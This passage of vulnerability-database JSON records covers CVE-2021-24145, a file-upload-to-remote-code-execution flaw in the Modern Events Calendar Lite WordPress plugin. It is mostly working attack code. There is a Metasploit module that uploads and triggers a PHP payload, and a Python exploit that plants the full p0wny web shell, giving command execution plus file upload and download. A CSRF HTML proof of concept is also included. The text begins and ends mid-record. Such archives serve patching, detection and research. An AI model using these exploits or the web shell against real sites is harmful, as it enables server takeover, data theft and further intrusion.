[true, 'Username of the admin account', 'admin']),\n OptString.new('PASSWORD', [true, 'Password of the admin account', 'admin']),\n OptString.new('TARGETURI', [true, 'The base path of the Wordpress server', '/'])\n ]\n end\n\n def check\n unless wordpress_and_online?\n return CheckCode::Safe('Server not online or not detected as Wordpress')\n end\n\n cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])\n if cookie\n check_plugin_version_from_readme('modern-events-calendar-lite', '5.16.5')\n else\n CheckCode::Detected('The admin credentials given are wrong !')\n end\n end\n\n def exploit\n cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])\n fail_with(Failure::NoAccess, 'Authentication failed') unless cookie\n payload_name = \"#{Rex::Text.rand_text_alpha_lower(5)}.php\"\n\n post_data = 
Rex::MIME::Message.new\n post_data.add_part(payload.encoded, 'text/csv', nil, \"form-data; name='feed'; filename='#{payload_name}'\")\n post_data.add_part('import-start-bookings', nil, nil, \"form-data; name='mec-ix-action'\")\n\n print_status(\"Uploading file \\'#{payload_name}\\' containing the payload...\")\n\n r = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'wp-admin/admin.php'),\n 'headers' => {\n 'Origin' => full_uri('')\n },\n 'vars_get' => {\n 'page' => 'MEC-ix',\n 'tab' => 'MEC-import'\n },\n 'cookie' => cookie,\n 'data' => post_data.to_s,\n 'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\"\n )\n\n fail_with(Failure::UnexpectedReply, \"Wasn't able to upload the payload file\") unless r&.code == 200\n register_file_for_cleanup(payload_name)\n\n print_status('Triggering the payload ...')\n send_request_cgi(\n 'method' => 'GET',\n 'headers' => {\n 'Origin' => full_uri('')\n },\n 'cookie' => cookie,\n 'uri' => normalize_uri(target_uri.path, \"/wp-content/uploads/#{payload_name}\")\n )\n end\nend\n", "sourceHref": "https://0day.today/exploit/36594", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "wpvulndb": [{"lastseen": "2021-02-15T22:17:05", "description": "The plugin did not properly check the imported file, allowing PHP ones to be uploaded by administrator by using the 'text/csv' content-type in the request. 
The issue could also be exploited via a CSRF attack, as such a check was also missing.\n\n### PoC\n\nhttps://drive.google.com/file/d/1qQfqnQOObBOmCFTTw1uGYmwxWe6uljhb/view?usp=sharing Uploaded file will be at /wp-content/uploads/aa.php\n", "cvss3": {}, "published": "2021-01-29T00:00:00", "type": "wpvulndb", "title": "Modern Events Calendar Lite < 5.16.5 - Authenticated Arbitrary File Upload leading to RCE", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2021-24145"], "modified": "2021-02-01T06:02:35", "id": "WPVDB-ID:F42CC26B-9AAB-4824-8168-B5B8571D1610", "href": "https://wpscan.com/vulnerability/f42cc26b-9aab-4824-8168-b5b8571d1610", "sourceData": "", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2021-07-02T16:24:06", "description": "", "cvss3": {}, "published": "2021-07-02T00:00:00", "type": "packetstorm", "title": "WordPress Modern Events Calendar 5.16.2 Shell Upload", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-24145"], "modified": "2021-07-02T00:00:00", "id": "PACKETSTORM:163346", "href": "https://packetstormsecurity.com/files/163346/WordPress-Modern-Events-Calendar-5.16.2-Shell-Upload.html", "sourceData": "`# Exploit Title: Wordpress Plugin Modern Events Calendar 5.16.2 - Remote Code Execution (Authenticated) \n# Date 01.07.2021 \n# Exploit Author: Ron Jost (Hacker5preme) \n# Vendor Homepage: https://webnus.net/modern-events-calendar/ \n# Software Link: https://downloads.wordpress.org/plugin/modern-events-calendar-lite.5.16.2.zip \n# Version: Before 5.16.5 \n# Tested on: Ubuntu 18.04 \n# CVE: CVE-2021-24145 \n# CWE: CWE-434 \n# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24145/README.md \n \n''' \nDescription: \nArbitrary file upload in the Modern Events Calendar Lite WordPress plugin, versions before 5.16.5, \ndid not properly check the imported file, allowing PHP ones to be uploaded by administrator by using the 'text/csv' \ncontent-type in the request. 
\n''' \n \n \n''' \nBanner: \n''' \nbanner = \"\"\" \n______ _______ ____ ___ ____ _ ____ _ _ _ _ _ ____ \n/ ___\\ \\ / / ____| |___ \\ / _ \\___ \\/ | |___ \\| || | / | || || ___| \n| | \\ \\ / /| _| _____ __) | | | |__) | |_____ __) | || |_| | || ||___ \\ \n| |___ \\ V / | |__|_____/ __/| |_| / __/| |_____/ __/|__ _| |__ _|__) | \n\\____| \\_/ |_____| |_____|\\___/_____|_| |_____| |_| |_| |_||____/ \n \n* Wordpress Plugin Modern Events Calendar Lite RCE \n* @Hacker5preme \n \n \n\"\"\" \nprint(banner) \n \n''' \nImport required modules: \n''' \nimport requests \nimport argparse \n \n''' \nUser-Input: \n''' \nmy_parser = argparse.ArgumentParser(description='Wordpress Plugin Modern Events Calenar Lite RCE (Authenticated)') \nmy_parser.add_argument('-T', '--IP', type=str) \nmy_parser.add_argument('-P', '--PORT', type=str) \nmy_parser.add_argument('-U', '--PATH', type=str) \nmy_parser.add_argument('-u', '--USERNAME', type=str) \nmy_parser.add_argument('-p', '--PASSWORD', type=str) \nargs = my_parser.parse_args() \ntarget_ip = args.IP \ntarget_port = args.PORT \nwp_path = args.PATH \nusername = args.USERNAME \npassword = args.PASSWORD \nprint('') \n \n''' \nAuthentication: \n''' \nsession = requests.Session() \nauth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php' \n \n# Header: \nheader = { \n'Host': target_ip, \n'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0', \n'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', \n'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', \n'Accept-Encoding': 'gzip, deflate', \n'Content-Type': 'application/x-www-form-urlencoded', \n'Origin': 'http://' + target_ip, \n'Connection': 'close', \n'Upgrade-Insecure-Requests': '1' \n} \n \n# Body: \nbody = { \n'log': username, \n'pwd': password, \n'wp-submit': 'Log In', \n'testcookie': '1' \n} \n \n# Authenticate: \nprint('') \nauth = session.post(auth_url, headers=header, data=body) \nauth_header 
= auth.headers['Set-Cookie'] \nif 'wordpress_logged_in' in auth_header: \nprint('[+] Authentication successfull !') \nelse: \nprint('[-] Authentication failed !') \nexit() \n \n \n''' \nExploit: \n''' \nexploit_url = \"http://\" + target_ip + ':' + target_port + wp_path + \"wp-admin/admin.php?page=MEC-ix&tab=MEC-import\" \n \n# Exploit Header: \nheader = { \n\"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0\", \n\"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\", \n\"Accept-Language\": \"de,en-US;q=0.7,en;q=0.3\", \n\"Accept-Encoding\": \"gzip, deflate\", \n\"Content-Type\": \"multipart/form-data; boundary=---------------------------29650037893637916779865254589\", \n\"Origin\": \"http://\" + target_ip, \n\"Connection\": \"close\", \n\"Upgrade-Insecure-Requests\": \"1\" \n} \n \n# Exploit Body: (using p0wny shell: https://github.com/flozz/p0wny-shell \nbody = \"-----------------------------29650037893637916779865254589\\r\\nContent-Disposition: form-data; name=\\\"feed\\\"; filename=\\\"shell.php\\\"\\r\\nContent-Type: text/csv\\r\\n\\r\\n<?php\\n\\nfunction featureShell($cmd, $cwd) {\\n $stdout = array();\\n\\n if (preg_match(\\\"/^\\\\s*cd\\\\s*$/\\\", $cmd)) {\\n // pass\\n } elseif (preg_match(\\\"/^\\\\s*cd\\\\s+(.+)\\\\s*(2>&1)?$/\\\", $cmd)) {\\n chdir($cwd);\\n preg_match(\\\"/^\\\\s*cd\\\\s+([^\\\\s]+)\\\\s*(2>&1)?$/\\\", $cmd, $match);\\n chdir($match[1]);\\n } elseif (preg_match(\\\"/^\\\\s*download\\\\s+[^\\\\s]+\\\\s*(2>&1)?$/\\\", $cmd)) {\\n chdir($cwd);\\n preg_match(\\\"/^\\\\s*download\\\\s+([^\\\\s]+)\\\\s*(2>&1)?$/\\\", $cmd, $match);\\n return featureDownload($match[1]);\\n } else {\\n chdir($cwd);\\n exec($cmd, $stdout);\\n }\\n\\n return array(\\n \\\"stdout\\\" => $stdout,\\n \\\"cwd\\\" => getcwd()\\n );\\n}\\n\\nfunction featurePwd() {\\n return array(\\\"cwd\\\" => getcwd());\\n}\\n\\nfunction featureHint($fileName, $cwd, $type) {\\n chdir($cwd);\\n if 
($type == 'cmd') {\\n $cmd = \\\"compgen -c $fileName\\\";\\n } else {\\n $cmd = \\\"compgen -f $fileName\\\";\\n }\\n $cmd = \\\"/bin/bash -c \\\\\\\"$cmd\\\\\\\"\\\";\\n $files = explode(\\\"\\\\n\\\", shell_exec($cmd));\\n return array(\\n 'files' => $files,\\n );\\n}\\n\\nfunction featureDownload($filePath) {\\n $file = @file_get_contents($filePath);\\n if ($file === FALSE) {\\n return array(\\n 'stdout' => array('File not found / no read permission.'),\\n 'cwd' => getcwd()\\n );\\n } else {\\n return array(\\n 'name' => basename($filePath),\\n 'file' => base64_encode($file)\\n );\\n }\\n}\\n\\nfunction featureUpload($path, $file, $cwd) {\\n chdir($cwd);\\n $f = @fopen($path, 'wb');\\n if ($f === FALSE) {\\n return array(\\n 'stdout' => array('Invalid path / no write permission.'),\\n 'cwd' => getcwd()\\n );\\n } else {\\n fwrite($f, base64_decode($file));\\n fclose($f);\\n return array(\\n 'stdout' => array('Done.'),\\n 'cwd' => getcwd()\\n );\\n }\\n}\\n\\nif (isset($_GET[\\\"feature\\\"])) {\\n\\n $response = NULL;\\n\\n switch ($_GET[\\\"feature\\\"]) {\\n case \\\"shell\\\":\\n $cmd = $_POST['cmd'];\\n if (!preg_match('/2>/', $cmd)) {\\n $cmd .= ' 2>&1';\\n }\\n $response = featureShell($cmd, $_POST[\\\"cwd\\\"]);\\n break;\\n case \\\"pwd\\\":\\n $response = featurePwd();\\n break;\\n case \\\"hint\\\":\\n $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\\n break;\\n case 'upload':\\n $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\\n }\\n\\n header(\\\"Content-Type: application/json\\\");\\n echo json_encode($response);\\n die();\\n}\\n\\n?><!DOCTYPE html>\\n\\n<html>\\n\\n <head>\\n <meta charset=\\\"UTF-8\\\" />\\n <title>p0wny@shell:~#</title>\\n <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\" />\\n <style>\\n html, body {\\n margin: 0;\\n padding: 0;\\n background: #333;\\n color: #eee;\\n font-family: monospace;\\n }\\n\\n *::-webkit-scrollbar-track {\\n 
border-radius: 8px;\\n background-color: #353535;\\n }\\n\\n *::-webkit-scrollbar {\\n width: 8px;\\n height: 8px;\\n }\\n\\n *::-webkit-scrollbar-thumb {\\n border-radius: 8px;\\n -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3);\\n background-color: #bcbcbc;\\n }\\n\\n #shell {\\n background: #222;\\n max-width: 800px;\\n margin: 50px auto 0 auto;\\n box-shadow: 0 0 5px rgba(0, 0, 0, .3);\\n font-size: 10pt;\\n display: flex;\\n \n \n# Exploit \nsession.post(exploit_url, headers=header, data=body) \nprint('') \nprint('[+] Shell Uploaded to: ' + 'http://' + target_ip + ':' + target_port + wp_path + '/wp-content/uploads/shell.php') \nprint('') \n \n \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/163346/wpmec5162-shell.txt", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}, {"lastseen": "2021-07-26T16:47:13", "description": "", "cvss3": {}, "published": "2021-07-26T00:00:00", "type": "packetstorm", "title": "WordPress Modern Events Calendar Remote Code Execution", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-24145"], "modified": "2021-07-26T00:00:00", "id": "PACKETSTORM:163672", "href": "https://packetstormsecurity.com/files/163672/WordPress-Modern-Events-Calendar-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \nclass MetasploitModule < Msf::Exploit::Remote \nRank = ExcellentRanking \n \ninclude Msf::Exploit::Remote::HttpClient \nprepend Msf::Exploit::Remote::AutoCheck \ninclude Msf::Exploit::CmdStager \ninclude Msf::Exploit::Remote::HTTP::Wordpress \ninclude Msf::Exploit::FileDropper \n \ndef initialize(info = {}) \nsuper( \nupdate_info( \ninfo, \n'Name' => 'Wordpress Plugin Modern Events Calendar - Authenticated Remote Code Execution', \n'Description' => %q{ \nThis module allows an attacker with a privileged Wordpress account to launch a reverse shell \ndue to an 
arbitrary file upload vulnerability in Wordpress plugin Modern Events Calendar < 5.16.5. \nThis is due to an incorrect check of the uploaded file extension. \nIndeed, by using `text/csv` content-type in a request, it is possible to upload a .php payload as is is not forbidden by the plugin. \nFinally, the uploaded payload can be triggered by a call to `/wp-content/uploads/<random_payload_name>.php` \n}, \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Nguyen Van Khanh', # Original PoC and discovery \n'Ron Jost', # Exploit-db \n'Yann Castel (yann.castel[at]orange.com)' # Metasploit module \n], \n'References' => \n[ \n['EDB', '50115'], \n['CVE', '2021-24145'], \n['CWE', '434'] \n], \n'Platform' => [ 'php' ], \n'Arch' => ARCH_PHP, \n'Targets' => \n[ \n[ 'Wordpress Modern Events Calendar < 5.16.5', {}] \n], \n'Privileged' => false, \n'DisclosureDate' => '2021-01-29', \n'Notes' => \n{ \n'Stability' => [ CRASH_SAFE ], \n'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ], \n'Reliability' => [ REPEATABLE_SESSION ] \n} \n) \n) \n \nregister_options [ \nOptString.new('USERNAME', [true, 'Username of the admin account', 'admin']), \nOptString.new('PASSWORD', [true, 'Password of the admin account', 'admin']), \nOptString.new('TARGETURI', [true, 'The base path of the Wordpress server', '/']) \n] \nend \n \ndef check \nunless wordpress_and_online? 
\nreturn CheckCode::Safe('Server not online or not detected as Wordpress') \nend \n \ncookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD']) \nif cookie \ncheck_plugin_version_from_readme('modern-events-calendar-lite', '5.16.5') \nelse \nCheckCode::Detected('The admin credentials given are wrong !') \nend \nend \n \ndef exploit \ncookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD']) \nfail_with(Failure::NoAccess, 'Authentication failed') unless cookie \npayload_name = \"#{Rex::Text.rand_text_alpha_lower(5)}.php\" \n \npost_data = Rex::MIME::Message.new \npost_data.add_part(payload.encoded, 'text/csv', nil, \"form-data; name='feed'; filename='#{payload_name}'\") \npost_data.add_part('import-start-bookings', nil, nil, \"form-data; name='mec-ix-action'\") \n \nprint_status(\"Uploading file \\'#{payload_name}\\' containing the payload...\") \n \nr = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, 'wp-admin/admin.php'), \n'headers' => { \n'Origin' => full_uri('') \n}, \n'vars_get' => { \n'page' => 'MEC-ix', \n'tab' => 'MEC-import' \n}, \n'cookie' => cookie, \n'data' => post_data.to_s, \n'ctype' => \"multipart/form-data; boundary=#{post_data.bound}\" \n) \n \nfail_with(Failure::UnexpectedReply, \"Wasn't able to upload the payload file\") unless r&.code == 200 \nregister_file_for_cleanup(payload_name) \n \nprint_status('Triggering the payload ...') \nsend_request_cgi( \n'method' => 'GET', \n'headers' => { \n'Origin' => full_uri('') \n}, \n'cookie' => cookie, \n'uri' => normalize_uri(target_uri.path, \"/wp-content/uploads/#{payload_name}\") \n) \nend \nend \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/163672/wp_plugin_modern_events_calendar_rce.rb.txt", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}], "wpexploit": [{"lastseen": "2021-02-15T22:17:05", "description": "The plugin did not properly check the imported file, allowing PHP ones to be uploaded by administrator 
by using the 'text/csv' content-type in the request. The issue could also be exploited via a CRSF attack, as such check was also missing.\n", "cvss3": {}, "published": "2021-01-29T00:00:00", "type": "wpexploit", "title": "Modern Events Calendar Lite < 5.16.5 - Authenticated Arbitrary File Upload leading to RCE", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2021-24145"], "modified": "2021-02-01T06:02:35", "id": "WPEX-ID:F42CC26B-9AAB-4824-8168-B5B8571D1610", "href": "", "sourceData": "https://drive.google.com/file/d/1qQfqnQOObBOmCFTTw1uGYmwxWe6uljhb/view?usp=sharing\r\n\r\n<html>\r\n <body onload=\"submitRequest();\">\r\n <script>\r\n function submitRequest()\r\n {\r\n var xhr = new XMLHttpRequest();\r\n xhr.open(\"POST\", \"https:\\/\\/example.com\\/wp-admin\\/admin.php?page=MEC-ix&tab=MEC-import\", true);\r\n xhr.setRequestHeader(\"Accept\", \"text\\/html,application\\/xhtml+xml,application\\/xml;q=0.9,image\\/webp,*\\/*;q=0.8\");\r\n xhr.setRequestHeader(\"Accept-Language\", \"en-GB,en;q=0.5\");\r\n xhr.setRequestHeader(\"Content-Type\", \"multipart\\/form-data; boundary=---------------------------132370916641787807752589698875\");\r\n xhr.withCredentials = true;\r\n var body = \"-----------------------------132370916641787807752589698875\\r\\n\" + \r\n \"Content-Disposition: form-data; name=\\\"feed\\\"; filename=\\\"aa.php\\\"\\r\\n\" + \r\n \"Content-Type: text/csv\\r\\n\" + \r\n \"\\r\\n\" + \r\n \"\\x3c?php echo \\'FAILED\\'; ?\\x3e\\n\" + \r\n \"\\r\\n\" + \r\n \"-----------------------------132370916641787807752589698875\\r\\n\" + \r\n \"Content-Disposition: form-data; name=\\\"mec-ix-action\\\"\\r\\n\" + \r\n \"\\r\\n\" + \r\n \"import-start-bookings\\r\\n\" + \r\n \"-----------------------------132370916641787807752589698875--\\r\\n\";\r\n var aBody = new Uint8Array(body.length);\r\n for (var i = 0; i < aBody.length; i++)\r\n aBody[i] = body.charCodeAt(i); \r\n xhr.send(new Blob([aBody]));\r\n }\r\n </script>\r\n 
</body>\r\n</html>\r\n\r\n\r\nUploaded file will be at /wp-content/uploads/aa.php", "cvss": {"score": 0.0, "vector": "NONE"}}], "exploitdb": [{"lastseen": "2022-05-13T17:36:54", "description": "", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-02T00:00:00", "type": "exploitdb", "title": "Wordpress Plugin Modern Events Calendar 5.16.2 - Remote Code Execution (Authenticated)", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["2021-24145", "CVE-2021-24145"], "modified": "2021-07-02T00:00:00", "id": "EDB-ID:50082", "href": "https://www.exploit-db.com/exploits/50082", "sourceData": "# Exploit Title: Wordpress Plugin Modern Events Calendar 5.16.2 - Remote Code Execution (Authenticated)\r\n# Date 01.07.2021\r\n# Exploit Author: Ron Jost (Hacker5preme)\r\n# Vendor Homepage: https://webnus.net/modern-events-calendar/\r\n# Software Link: https://downloads.wordpress.org/plugin/modern-events-calendar-lite.5.16.2.zip\r\n# Version: Before 5.16.5\r\n# Tested on: Ubuntu 18.04\r\n# CVE: CVE-2021-24145\r\n# CWE: CWE-434\r\n# Documentation: 
https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24145/README.md\r\n\r\n'''\r\nDescription:\r\nArbitrary file upload in the Modern Events Calendar Lite WordPress plugin, versions before 5.16.5,\r\ndid not properly check the imported file, allowing PHP ones to be uploaded by administrator by using the 'text/csv'\r\ncontent-type in the request.\r\n'''\r\n\r\n\r\n'''\r\nBanner:\r\n'''\r\nbanner = \"\"\"\r\n ______ _______ ____ ___ ____ _ ____ _ _ _ _ _ ____ \r\n / ___\\ \\ / / ____| |___ \\ / _ \\___ \\/ | |___ \\| || | / | || || ___| \r\n| | \\ \\ / /| _| _____ __) | | | |__) | |_____ __) | || |_| | || ||___ \\ \r\n| |___ \\ V / | |__|_____/ __/| |_| / __/| |_____/ __/|__ _| |__ _|__) |\r\n \\____| \\_/ |_____| |_____|\\___/_____|_| |_____| |_| |_| |_||____/ \r\n \r\n * Wordpress Plugin Modern Events Calendar Lite RCE \r\n * @Hacker5preme\r\n \r\n\r\n\"\"\"\r\nprint(banner)\r\n\r\n'''\r\nImport required modules:\r\n'''\r\nimport requests\r\nimport argparse\r\n\r\n'''\r\nUser-Input:\r\n'''\r\nmy_parser = argparse.ArgumentParser(description='Wordpress Plugin Modern Events Calenar Lite RCE (Authenticated)')\r\nmy_parser.add_argument('-T', '--IP', type=str)\r\nmy_parser.add_argument('-P', '--PORT', type=str)\r\nmy_parser.add_argument('-U', '--PATH', type=str)\r\nmy_parser.add_argument('-u', '--USERNAME', type=str)\r\nmy_parser.add_argument('-p', '--PASSWORD', type=str)\r\nargs = my_parser.parse_args()\r\ntarget_ip = args.IP\r\ntarget_port = args.PORT\r\nwp_path = args.PATH\r\nusername = args.USERNAME\r\npassword = args.PASSWORD\r\nprint('')\r\n\r\n'''\r\nAuthentication:\r\n'''\r\nsession = requests.Session()\r\nauth_url = 'http://' + target_ip + ':' + target_port + wp_path + 'wp-login.php'\r\n\r\n# Header:\r\nheader = {\r\n 'Host': target_ip,\r\n 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0',\r\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',\r\n 
'Accept-Language': 'de,en-US;q=0.7,en;q=0.3',\r\n 'Accept-Encoding': 'gzip, deflate',\r\n 'Content-Type': 'application/x-www-form-urlencoded',\r\n 'Origin': 'http://' + target_ip,\r\n 'Connection': 'close',\r\n 'Upgrade-Insecure-Requests': '1'\r\n}\r\n\r\n# Body:\r\nbody = {\r\n 'log': username,\r\n 'pwd': password,\r\n 'wp-submit': 'Log In',\r\n 'testcookie': '1'\r\n}\r\n\r\n# Authenticate:\r\nprint('')\r\nauth = session.post(auth_url, headers=header, data=body)\r\nauth_header = auth.headers['Set-Cookie']\r\nif 'wordpress_logged_in' in auth_header:\r\n print('[+] Authentication successfull !')\r\nelse:\r\n print('[-] Authentication failed !')\r\n exit()\r\n\r\n\r\n'''\r\nExploit:\r\n'''\r\nexploit_url = \"http://\" + target_ip + ':' + target_port + wp_path + \"wp-admin/admin.php?page=MEC-ix&tab=MEC-import\"\r\n\r\n# Exploit Header:\r\nheader = {\r\n \"User-Agent\": \"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0\",\r\n \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8\",\r\n \"Accept-Language\": \"de,en-US;q=0.7,en;q=0.3\",\r\n \"Accept-Encoding\": \"gzip, deflate\",\r\n \"Content-Type\": \"multipart/form-data; boundary=---------------------------29650037893637916779865254589\",\r\n \"Origin\": \"http://\" + target_ip,\r\n \"Connection\": \"close\",\r\n \"Upgrade-Insecure-Requests\": \"1\"\r\n}\r\n\r\n# Exploit Body: (using p0wny shell: https://github.com/flozz/p0wny-shell\r\nbody = \"-----------------------------29650037893637916779865254589\\r\\nContent-Disposition: form-data; name=\\\"feed\\\"; filename=\\\"shell.php\\\"\\r\\nContent-Type: text/csv\\r\\n\\r\\n<?php\\n\\nfunction featureShell($cmd, $cwd) {\\n $stdout = array();\\n\\n if (preg_match(\\\"/^\\\\s*cd\\\\s*$/\\\", $cmd)) {\\n // pass\\n } elseif (preg_match(\\\"/^\\\\s*cd\\\\s+(.+)\\\\s*(2>&1)?$/\\\", $cmd)) {\\n chdir($cwd);\\n preg_match(\\\"/^\\\\s*cd\\\\s+([^\\\\s]+)\\\\s*(2>&1)?$/\\\", $cmd, $match);\\n chdir($match[1]);\\n } 
elseif (preg_match(\\\"/^\\\\s*download\\\\s+[^\\\\s]+\\\\s*(2>&1)?$/\\\", $cmd)) {\\n chdir($cwd);\\n preg_match(\\\"/^\\\\s*download\\\\s+([^\\\\s]+)\\\\s*(2>&1)?$/\\\", $cmd, $match);\\n return featureDownload($match[1]);\\n } else {\\n chdir($cwd);\\n exec($cmd, $stdout);\\n }\\n\\n return array(\\n \\\"stdout\\\" => $stdout,\\n \\\"cwd\\\" => getcwd()\\n );\\n}\\n\\nfunction featurePwd() {\\n return array(\\\"cwd\\\" => getcwd());\\n}\\n\\nfunction featureHint($fileName, $cwd, $type) {\\n chdir($cwd);\\n if ($type == 'cmd') {\\n $cmd = \\\"compgen -c $fileName\\\";\\n } else {\\n $cmd = \\\"compgen -f $fileName\\\";\\n }\\n $cmd = \\\"/bin/bash -c \\\\\\\"$cmd\\\\\\\"\\\";\\n $files = explode(\\\"\\\\n\\\", shell_exec($cmd));\\n return array(\\n 'files' => $files,\\n );\\n}\\n\\nfunction featureDownload($filePath) {\\n $file = @file_get_contents($filePath);\\n if ($file === FALSE) {\\n return array(\\n 'stdout' => array('File not found / no read permission.'),\\n 'cwd' => getcwd()\\n );\\n } else {\\n return array(\\n 'name' => basename($filePath),\\n 'file' => base64_encode($file)\\n );\\n }\\n}\\n\\nfunction featureUpload($path, $file, $cwd) {\\n chdir($cwd);\\n $f = @fopen($path, 'wb');\\n if ($f === FALSE) {\\n return array(\\n 'stdout' => array('Invalid path / no write permission.'),\\n 'cwd' => getcwd()\\n );\\n } else {\\n fwrite($f, base64_decode($file));\\n fclose($f);\\n return array(\\n 'stdout' => array('Done.'),\\n 'cwd' => getcwd()\\n );\\n }\\n}\\n\\nif (isset($_GET[\\\"feature\\\"])) {\\n\\n $response = NULL;\\n\\n switch ($_GET[\\\"feature\\\"]) {\\n case \\\"shell\\\":\\n $cmd = $_POST['cmd'];\\n if (!preg_match('/2>/', $cmd)) {\\n $cmd .= ' 2>&1';\\n }\\n $response = featureShell($cmd, $_POST[\\\"cwd\\\"]);\\n break;\\n case \\\"pwd\\\":\\n $response = featurePwd();\\n break;\\n case \\\"hint\\\":\\n $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\\n break;\\n case 'upload':\\n $response = 
featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\\n }\\n\\n header(\\\"Content-Type: application/json\\\");\\n echo json_encode($response);\\n die();\\n}\\n\\n?><!DOCTYPE html>\\n\\n<html>\\n\\n <head>\\n <meta charset=\\\"UTF-8\\\" />\\n <title>p0wny@shell:~#</title>\\n <meta name=\\\"viewport\\\" content=\\\"width=device-width, initial-scale=1.0\\\" />\\n <style>\\n html, body {\\n margin: 0;\\n padding: 0;\\n background: #333;\\n color: #eee;\\n font-family: monospace;\\n }\\n\\n *::-webkit-scrollbar-track {\\n border-radius: 8px;\\n background-color: #353535;\\n }\\n\\n *::-webkit-scrollbar {\\n width: 8px;\\n height: 8px;\\n }\\n\\n *::-webkit-scrollbar-thumb {\\n border-radius: 8px;\\n -webkit-box-shadow: inset 0 0 6px rgba(0,0,0,.3);\\n background-color: #bcbcbc;\\n }\\n\\n #shell {\\n background: #222;\\n max-width: 800px;\\n margin: 50px auto 0 auto;\\n box-shadow: 0 0 5px rgba(0, 0, 0, .3);\\n font-size: 10pt;\\n display: flex;\\n flex-direction: column;\\n align-items: stretch;\\n }\\n\\n #shell-content {\\n height: 500px;\\n overflow: auto;\\n padding: 5px;\\n white-space: pre-wrap;\\n flex-grow: 1;\\n }\\n\\n #shell-logo {\\n font-weight: bold;\\n color: #FF4180;\\n text-align: center;\\n }\\n\\n @media (max-width: 991px) {\\n #shell-logo {\\n font-size: 6px;\\n margin: -25px 0;\\n }\\n\\n html, body, #shell {\\n height: 100%;\\n width: 100%;\\n max-width: none;\\n }\\n\\n #shell {\\n margin-top: 0;\\n }\\n }\\n\\n @media (max-width: 767px) {\\n #shell-input {\\n flex-direction: column;\\n }\\n }\\n\\n @media (max-width: 320px) {\\n #shell-logo {\\n font-size: 5px;\\n }\\n }\\n\\n .shell-prompt {\\n font-weight: bold;\\n color: #75DF0B;\\n }\\n\\n .shell-prompt > span {\\n color: #1BC9E7;\\n }\\n\\n #shell-input {\\n display: flex;\\n box-shadow: 0 -1px 0 rgba(0, 0, 0, .3);\\n border-top: rgba(255, 255, 255, .05) solid 1px;\\n }\\n\\n #shell-input > label {\\n flex-grow: 0;\\n display: block;\\n padding: 0 5px;\\n height: 30px;\\n 
